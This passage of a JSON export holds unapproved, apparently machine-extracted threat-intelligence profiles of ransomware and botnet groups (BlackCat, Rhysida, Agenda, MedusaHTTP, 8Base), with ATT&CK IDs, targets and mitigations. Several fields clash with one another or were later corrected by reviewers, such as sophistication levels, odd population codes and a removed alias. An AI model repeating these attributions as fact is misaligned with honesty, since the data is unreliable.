  "raw_openAI_analysis": "{\"threat_actor\": [\"BlackCat\"], \"aliases\": [\"ALPHV\"], \"country_of_origin\": [], \"target_countries\": [\"US\"], \"target_regions\": [\"americas\"], \"threat_actor_overview\": [\"BlackCat is a recent and growing ransomware-as-a-service (RaaS) group that targeted several organizations worldwide over the past few months. It is not a rebranding of BlackMatter\", \" but its team is made from affiliates of other RaaS groups (including BlackMatter).\"], \"target_populations\": [], \"target_industry_sectors\": [\"unknown\"], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\"], \"threat_actor_capabilities\": [\"T1078.003\", \"T1021.006\", \"T1021.001\", \"T1021.002\", \"T1021.004\", \"T1021.005\", \"T1078.001\", \"T1078.002\", \"T1078.004\", \"T1078.005\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"crime-syndicate\"], \"attack_mitigations\": [\"Understanding the techniques and tools used by RaaS affiliates helps organizations detect and prevent attacks before the ransomware itself is executed.\"], \"attack_consequences\": [\"Victims of a successful attack are likely to experience data loss due to file encryption and potential public disclosure of stolen files.\"], \"vulnerabilities\": [], \"sources\": [\"Cisco Talos Intelligence Blog\"]}",
  "approval_status": "PENDING APPROVAL",
  "approval_status_changed_by": null,
  "approval_status_changed_on": null,
  "approval_message": null,
  "change_log": [],
  "threat_actor": "BlackCat"
},
{
  "_id": {
    "$oid": "652461a245e55a5610c324c1"
  },
  "report": {
    "$oid": "6524614edd4337e9edebd489"
  },
  "threat_actor_overview": "The Rhysida ransomware group was first revealed in May this year,  and since then has been linked to several impactful intrusions,  including an attack on the Chilean Army. Recently the group was also tied to an attack against Prospect Medical Holdings,  affecting 17 hospitals and 166 clinics across the United States. After this attack,  the US Department of Health and Human Services defined Rhysida as a significant threat to the healthcare sector.",
  "aliases": [
    "Vice Society"
  ],
  "sources": [
    "Check Point Incident Response Team (CPIRT)",
    "Check Point Research (CPR)"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Disruption of Service",
    "Damage and Destruction",
    "Credential Harvesting"
  ],
  "threat_actor_capabilities": [
    "T1078.003",
    "T1078.001",
    "T1021.001",
    "T1021.002",
    "T1021.006",
    "T1059.001",
    "T1059.003",
    "T1059.005",
    "T1059.006",
    "T1059.007",
    "T1059.008",
    "T1560.001",
    "T1560.002",
    "T1560.003",
    "T1562.001",
    "T1562.004",
    "T1564.001",
    "T1564.002",
    "T1564.003",
    "T1564.004",
    "T1564.005",
    "T1564.006"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "crime-syndicate"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US",
    "CL"
  ],
  "target_regions": [
    "americas"
  ],
  "target_populations": [
    "Q"
  ],
  "target_industry_sectors": [
    "x-industry-sector--532c8286-2c6e-4ad3-8ffd-6d2d49f1b757",
    "x-industry-sector--bb358902-b786-4067-9de8-75277fe7a71e"
  ],
  "attack_mitigations": "Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics and file types and is protecting against the type of attacks and threats described in this report.",
  "attack_consequences": "Account Access Removal – The threat actor initiated a password change for tens of thousands of accounts in the domain to harden remediation efforts., Inhibit System Recovery – Before deploying the ransomware payload, the threat actor attempted to deploy a PowerShell script with a wide variety of capabilities., Data Encryption – The threat actor ended up deploying the Rhysida ransomware payload using PsExec.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Rhysida\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics and file types and is protecting against the type of attacks and threats described in this report.\", \"attack_consequences\": \"Account Access Removal \\u2013 The threat actor initiated a password change for tens of thousands of accounts in the domain to harden remediation efforts., Inhibit System Recovery \\u2013 Before deploying the ransomware payload, the threat actor attempted to deploy a PowerShell script with a wide variety of capabilities., Data Encryption \\u2013 The threat actor ended up deploying the Rhysida ransomware payload using PsExec.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The Rhysida ransomware group was first revealed in May this year,  and since then has been linked to several impactful intrusions,  including an attack on the Chilean Army. Recently the group was also tied to an attack against Prospect Medical Holdings,  affecting 17 hospitals and 166 clinics across the United States. After this attack,  the US Department of Health and Human Services defined Rhysida as a significant threat to the healthcare sector.\", \"target_countries\": [\"US\", \"CL\"], \"target_regions\": [\"americas\"], \"target_populations\": [\"Q\"], \"threat_actor_intent\": [\"Disruption of Service\", \"Damage and Destruction\", \"Credential Harvesting\"], \"target_industry_sectors\": [\"education\", \"healthcare\"], \"threat_actor_capabilities\": [\"T1078.003\", \"T1078.001\", \"T1021.001\", \"T1021.002\", \"T1021.006\", \"T1059.001\", \"T1059.003\", \"T1059.005\", \"T1059.006\", \"T1059.007\", \"T1059.008\", \"T1560.001\", \"T1560.002\", \"T1560.003\", \"T1562.001\", \"T1562.004\", \"T1564.001\", \"T1564.002\", \"T1564.003\", \"T1564.004\", \"T1564.005\", \"T1564.006\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"crime-syndicate\"], \"aliases\": [\"Vice Society\"], \"vulnerabilities\": [], \"sources\": [\"Check Point Incident Response Team (CPIRT)\", \"Check Point Research (CPR)\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Rhysida\"], \"aliases\": [\"Vice Society\"], \"country_of_origin\": [], \"target_countries\": [\"US\", \"CL\"], \"target_regions\": [\"americas\"], \"threat_actor_overview\": [\"The Rhysida ransomware group was first revealed in May this year\", \" and since then has been linked to several impactful intrusions\", \" including an attack on the Chilean Army. Recently the group was also tied to an attack against Prospect Medical Holdings\", \" affecting 17 hospitals and 166 clinics across the United States. After this attack\", \" the US Department of Health and Human Services defined Rhysida as a significant threat to the healthcare sector.\"], \"target_populations\": [\"Q\"], \"target_industry_sectors\": [\"education\", \"healthcare\"], \"threat_actor_intent\": [\"Disruption of Service\", \"Damage and Destruction\", \"Credential Harvesting\"], \"threat_actor_capabilities\": [\"T1078.003\", \"T1078.001\", \"T1021.001\", \"T1021.002\", \"T1021.006\", \"T1059.001\", \"T1059.003\", \"T1059.005\", \"T1059.006\", \"T1059.007\", \"T1059.008\", \"T1560.001\", \"T1560.002\", \"T1560.003\", \"T1562.001\", \"T1562.004\", \"T1564.001\", \"T1564.002\", \"T1564.003\", \"T1564.004\", \"T1564.005\", \"T1564.006\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"crime-syndicate\"], \"attack_mitigations\": [\"Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics and file types and is protecting against the type of attacks and threats described in this report.\"], \"attack_consequences\": [\"Account Access Removal \\u2013 The threat actor initiated a password change for tens of thousands of accounts in the domain to harden remediation efforts.\", \"Inhibit System Recovery \\u2013 Before deploying the ransomware payload, the threat actor attempted to deploy a PowerShell script with a wide variety of capabilities.\", \"Data Encryption \\u2013 The threat actor ended up deploying the Rhysida ransomware payload using PsExec.\"], \"vulnerabilities\": [], \"sources\": [\"Check Point Incident Response Team (CPIRT)\", \"Check Point Research (CPR)\"]}",
  "approval_status": "PENDING APPROVAL",
  "approval_status_changed_by": null,
  "approval_status_changed_on": null,
  "approval_message": null,
  "change_log": [],
  "threat_actor": "Rhysida"
},
{
  "_id": {
    "$oid": "6524997a7d9e080577267bd3"
  },
  "report": {
    "$oid": "652499200b3306d7e575e88b"
  },
  "threat_actor_overview": "Agenda,  also known as Qilin,  is a ransomware-as-a-service group that has recently started using Rust language for their ransomware. They have been known to target vital industries and have recently been seen targeting the healthcare and education sectors. They customize their ransomware for each victim and use tactics like intermittent encryption for faster encryption and detection evasion.",
  "aliases": [
    "Qilin"
  ],
  "sources": [
    "Trend Micro"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [
    "T1486",
    "T1489",
    "T1490"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "TH",
    "ID"
  ],
  "target_regions": [
    "asia"
  ],
  "target_populations": [
    "84120",
    "C Manufacturing",
    "J Information and Communication"
  ],
  "target_industry_sectors": [
    "x-industry-sector--bb358902-b786-4067-9de8-75277fe7a71e",
    "x-industry-sector--532c8286-2c6e-4ad3-8ffd-6d2d49f1b757",
    "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593"
  ],
  "attack_mitigations": "Enterprises and organizations should rely on a multilayered solution to secure data, including visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads.",
  "attack_consequences": "Victims may experience disruption of services, financial loss due to ransom payment, potential data leakage, and damage to their reputation.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Agenda\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Enterprises and organizations should rely on a multilayered solution to secure data, including visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads.\", \"attack_consequences\": \"Victims may experience disruption of services, financial loss due to ransom payment, potential data leakage, and damage to their reputation.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Agenda,  also known as Qilin,  is a ransomware-as-a-service group that has recently started using Rust language for their ransomware. They have been known to target vital industries and have recently been seen targeting the healthcare and education sectors. They customize their ransomware for each victim and use tactics like intermittent encryption for faster encryption and detection evasion.\", \"target_countries\": [\"TH\", \"ID\"], \"target_regions\": [\"asia\"], \"target_populations\": [\"C Manufacturing\", \"J Information and Communication\"], \"threat_actor_intent\": [\"Financial Theft\", \"Disruption of Service\"], \"target_industry_sectors\": [\"healthcare\", \"education\", \"manufacturing\"], \"threat_actor_capabilities\": [\"T1566.001\", \"T1486\", \"T1489\", \"T1490\", \"T1027\", \"T1021.002\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"crime-syndicate\"], \"aliases\": [\"Qilin\"], \"vulnerabilities\": [], \"sources\": [\"Trend Micro\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Agenda\"], \"aliases\": [\"Qilin\"], \"country_of_origin\": [], \"target_countries\": [\"TH\", \"ID\"], \"target_regions\": [\"asia\"], \"threat_actor_overview\": [\"Agenda\", \" also known as Qilin\", \" is a ransomware-as-a-service group that has recently started using Rust language for their ransomware. They have been known to target vital industries and have recently been seen targeting the healthcare and education sectors. They customize their ransomware for each victim and use tactics like intermittent encryption for faster encryption and detection evasion.\"], \"target_populations\": [\"C Manufacturing\", \"J Information and Communication\"], \"target_industry_sectors\": [\"healthcare\", \"education\", \"manufacturing\", \"IT\"], \"threat_actor_intent\": [\"Financial Theft\", \"Disruption of Service\"], \"threat_actor_capabilities\": [\"T1566.001\", \"T1486\", \"T1489\", \"T1490\", \"T1027\", \"T1021.002\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"crime-syndicate\"], \"attack_mitigations\": [\"Enterprises and organizations should rely on a multilayered solution to secure data, including visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads.\"], \"attack_consequences\": [\"Victims may experience disruption of services, financial loss due to ransom payment, potential data leakage, and damage to their reputation.\"], \"vulnerabilities\": [], \"sources\": [\"Trend Micro\"]}",
  "approval_status": "PENDING APPROVAL",
  "approval_status_changed_by": null,
  "approval_status_changed_on": null,
  "approval_message": null,
  "change_log": [
    {
      "_id": {
        "$oid": "6524a246aa0ab128d963559d"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-10-10T01:00:54.622Z"
      },
      "changes": [
        {
          "field": "threat_actor_capabilities",
          "previous_value": [
            "T1566.001",
            "T1486",
            "T1489",
            "T1490",
            "T1027",
            "T1021.002"
          ],
          "updated_value": [
            "T1486",
            "T1489",
            "T1490"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "65249c790b3306d7e575e88d"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-10-10T00:36:09.125Z"
      },
      "changes": [
        {
          "field": "target_populations",
          "previous_value": [
            "C Manufacturing",
            "J Information and Communication"
          ],
          "updated_value": [
            "84120",
            "C Manufacturing",
            "J Information and Communication"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "65249b660b3306d7e575e88c"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-10-10T00:31:34.914Z"
      },
      "changes": [
        {
          "field": "threat_actor_intent",
          "previous_value": [
            "Financial Theft",
            "Disruption of Service"
          ],
          "updated_value": [
            "Information Theft",
            "Financial Theft",
            "Disruption of Service"
          ]
        },
        {
          "field": "threat_actor_type",
          "previous_value": [
            "crime-syndicate"
          ],
          "updated_value": []
        }
      ]
    }
  ],
  "threat_actor": "Agenda"
},
{
  "_id": {
    "$oid": "6524a60f7f1b35547371e08f"
  },
  "report": {
    "$oid": "6524a5beaa0ab128d963559e"
  },
  "threat_actor_overview": "Stevenkings,  also known as MedusaHTTP and MedusaIRC,  is a threat actor who has been advertising botnet services on underground hacker marketplaces since 2015. The botnet has evolved from an IRC botnet to an HTTP botnet,  with the HTTP components appearing to be reused code from the leaked Diamond Fox DDoS botnet. The botnet is capable of various types of DDoS attacks and can also download and run executables.",
  "aliases": [
    "MedusaHTTP",
    "MedusaIRC"
  ],
  "sources": [
    "ASERT Team"
  ],
  "country_of_origin": "RU",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "individual"
  ],
  "threat_actor_type": [
    "hacker"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "The attacks can be mitigated using situationally appropriate firewall ACLs and other countermeasures available in Arbor products including HTTP Authentication,  Zombie Detection,  and AIF Malware Family Blocking.",
  "attack_consequences": "Victims of a successful attack are likely to experience service disruption and potential unauthorized downloads of malicious files.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Stevenkings\", \"country_of_origin\": \"RU\", \"attack_mitigations\": \"The attacks can be mitigated using situationally appropriate firewall ACLs and other countermeasures available in Arbor products including HTTP Authentication,  Zombie Detection,  and AIF Malware Family Blocking.\", \"attack_consequences\": \"Victims of a successful attack are likely to experience service disruption and potential unauthorized downloads of malicious files.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Stevenkings,  also known as MedusaHTTP and MedusaIRC,  is a threat actor who has been advertising botnet services on underground hacker marketplaces since 2015. The botnet has evolved from an IRC botnet to an HTTP botnet,  with the HTTP components appearing to be reused code from the leaked Diamond Fox DDoS botnet. The botnet is capable of various types of DDoS attacks and can also download and run executables.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Disruption of Service\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_type\": [\"hacker\"], \"aliases\": [\"MedusaHTTP\", \"MedusaIRC\"], \"vulnerabilities\": [], \"sources\": [\"ASERT Team\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Stevenkings\"], \"aliases\": [\"MedusaHTTP\", \"MedusaIRC\"], \"country_of_origin\": [\"RU\"], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"Stevenkings\", \" also known as MedusaHTTP and MedusaIRC\", \" is a threat actor who has been advertising botnet services on underground hacker marketplaces since 2015. The botnet has evolved from an IRC botnet to an HTTP botnet\", \" with the HTTP components appearing to be reused code from the leaked Diamond Fox DDoS botnet. The botnet is capable of various types of DDoS attacks and can also download and run executables.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Disruption of Service\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_sophistication\": [\"intermediate\"], \"threat_actor_type\": [\"hacker\"], \"attack_mitigations\": [\"The attacks can be mitigated using situationally appropriate firewall ACLs and other countermeasures available in Arbor products including HTTP Authentication\", \" Zombie Detection\", \" and AIF Malware Family Blocking.\"], \"attack_consequences\": [\"Victims of a successful attack are likely to experience service disruption and potential unauthorized downloads of malicious files.\"], \"vulnerabilities\": [], \"sources\": [\"ASERT Team\"]}",
  "approval_status": "PENDING APPROVAL",
  "approval_status_changed_by": null,
  "approval_status_changed_on": null,
  "approval_message": null,
  "change_log": [
    {
      "_id": {
        "$oid": "6524a943aa0ab128d963559f"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-10-10T01:30:43.714Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Stevenkings",
          "updated_value": "MedusaHTTP"
        }
      ]
    }
  ],
  "threat_actor": "MedusaHTTP"
},
{
  "_id": {
    "$oid": "6524af6bcf886dd1cb377880"
  },
  "report": {
    "$oid": "6524af08c281edf96bb13665"
  },
  "threat_actor_overview": "8Base is a ransomware group that has been active since April 2022. The group primarily targets small and medium-sized businesses (SMBs) across various sectors,  including business services,  finance,  manufacturing,  and information technology. The group is known for its double-extortion tactics and has rapidly gained notoriety due to its aggressive tactics and the significant number of victims it has claimed.",
  "sources": [
    "Daily Dark Web",
    "SOCRadar",
    "BushidoToken"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Financial Theft",
    "Information Theft",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [
    "T1595",
    "T1598",
    "T1583",
    "T1587",
    "T1566.001",
    "T1053",
    "T1059",
    "T1129",
    "T1547",
    "T1547.001",
    "T1036",
    "T1070.004",
    "T1112",
    "T1202",
    "T1222",
    "T1497",
    "T1562",
    "T1562.001",
    "T1562.004",
    "T1564",
    "T1564.001",
    "T1003",
    "T1056",
    "T1057",
    "T1082",
    "T1083",
    "T1518.001",
    "T1080",
    "T1005",
    "T1074",
    "T1560",
    "T1071",
    "T1071.001",
    "T1041",
    "T1485",
    "T1490"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "crime-syndicate"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US",
    "BR",
    "GB"
  ],
  "target_regions": [
    "americas",
    "south-america",
    "europe"
  ],
  "target_populations": [
    "Professional Services",
    "Manufacturing",
    "Construction",
    "Finance and Insurance",
    "Healthcare"
  ],
  "target_industry_sectors": [
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
    "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593"
  ],
  "attack_mitigations": "Implement robust cybersecurity measures, including keeping systems and software updated, training employees to recognize and avoid phishing attacks, and using advanced detection tools to identify and respond to threats quickly.",
  "attack_consequences": "Victims may experience data encryption, threat of data publication, brand or reputation damage, and potential financial loss due to ransom demands.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"8Base\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Implement robust cybersecurity measures, including keeping systems and software updated, training employees to recognize and avoid phishing attacks, and using advanced detection tools to identify and respond to threats quickly.\", \"attack_consequences\": \"Victims may experience data encryption, threat of data publication, brand or reputation damage, and potential financial loss due to ransom demands.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"8Base is a ransomware group that has been active since April 2022. The group primarily targets small and medium-sized businesses (SMBs) across various sectors,  including business services,  finance,  manufacturing,  and information technology. The group is known for its double-extortion tactics and has rapidly gained notoriety due to its aggressive tactics and the significant number of victims it has claimed.\", \"target_countries\": [\"US\", \"BR\", \"GB\"], \"target_regions\": [\"americas\", \"south-america\", \"europe\"], \"target_populations\": [\"Professional Services\", \"Manufacturing\", \"Construction\", \"Finance and Insurance\", \"Healthcare\"], \"threat_actor_intent\": [\"Financial Theft\", \"Information Theft\", \"Disruption of Service\"], \"target_industry_sectors\": [\"financial-services\", \"manufacturing\", \"technology\"], \"threat_actor_capabilities\": [\"T1595\", \"T1598\", \"T1583\", \"T1587\", \"T1566.001\", \"T1053\", \"T1059\", \"T1129\", \"T1547\", \"T1547.001\", \"T1036\", \"T1070.004\", \"T1112\", \"T1202\", \"T1222\", \"T1497\", \"T1562\", \"T1562.001\", \"T1562.004\", \"T1564\", \"T1564.001\", \"T1003\", \"T1056\", \"T1057\", \"T1082\", \"T1083\", \"T1518.001\", \"T1080\", \"T1005\", \"T1074\", \"T1560\", \"T1071\", \"T1071.001\", \"T1041\", \"T1485\", \"T1490\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"crime-syndicate\"], \"aliases\": [\"RansomHouse\"], \"vulnerabilities\": [], \"sources\": [\"Daily Dark Web\", \"SOCRadar\", \"BushidoToken\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"8Base\"], \"aliases\": [\"RansomHouse\"], \"country_of_origin\": [], \"target_countries\": [\"US\", \"BR\", \"GB\"], \"target_regions\": [\"americas\", \"south-america\", \"europe\"], \"threat_actor_overview\": [\"8Base is a ransomware group that has been active since April 2022. The group primarily targets small and medium-sized businesses (SMBs) across various sectors\", \" including business services\", \" finance\", \" manufacturing\", \" and information technology. The group is known for its double-extortion tactics and has rapidly gained notoriety due to its aggressive tactics and the significant number of victims it has claimed.\"], \"target_populations\": [\"Professional Services\", \"Manufacturing\", \"Construction\", \"Finance and Insurance\", \"Healthcare\"], \"target_industry_sectors\": [\"business-services\", \"financial-services\", \"manufacturing\", \"technology\"], \"threat_actor_intent\": [\"Financial Theft\", \"Information Theft\", \"Disruption of Service\"], \"threat_actor_capabilities\": [\"T1595\", \"T1598\", \"T1583\", \"T1587\", \"T1566.001\", \"T1053\", \"T1059\", \"T1129\", \"T1547\", \"T1547.001\", \"T1036\", \"T1070.004\", \"T1112\", \"T1202\", \"T1222\", \"T1497\", \"T1562\", \"T1562.001\", \"T1562.004\", \"T1564\", \"T1564.001\", \"T1003\", \"T1056\", \"T1057\", \"T1082\", \"T1083\", \"T1518.001\", \"T1080\", \"T1005\", \"T1074\", \"T1560\", \"T1071\", \"T1071.001\", \"T1041\", \"T1485\", \"T1490\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"crime-syndicate\"], \"attack_mitigations\": [\"Implement robust cybersecurity measures, including keeping systems and software updated, training employees to recognize and avoid phishing attacks, and using advanced detection tools to identify and respond to threats quickly.\"], \"attack_consequences\": [\"Victims may experience data encryption, threat of data publication, brand or reputation damage, and potential financial loss due to ransom demands.\"], \"vulnerabilities\": [], \"sources\": [\"Daily Dark Web\", \"SOCRadar\", \"BushidoToken\"]}",
  "approval_status": "PENDING APPROVAL",
  "approval_status_changed_by": null,
  "approval_status_changed_on": null,
  "approval_message": null,
  "change_log": [
    {
      "_id": {
        "$oid": "6524b36ac281edf96bb13666"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-10-10T02:14:02.962Z"
      },
      "changes": [
        {
          "field": "aliases",
          "previous_value": [
            "RansomHouse"
          ],
          "updated_value": []
        }
      ]
    }
  ],
  "threat_actor": "8Base"
}]
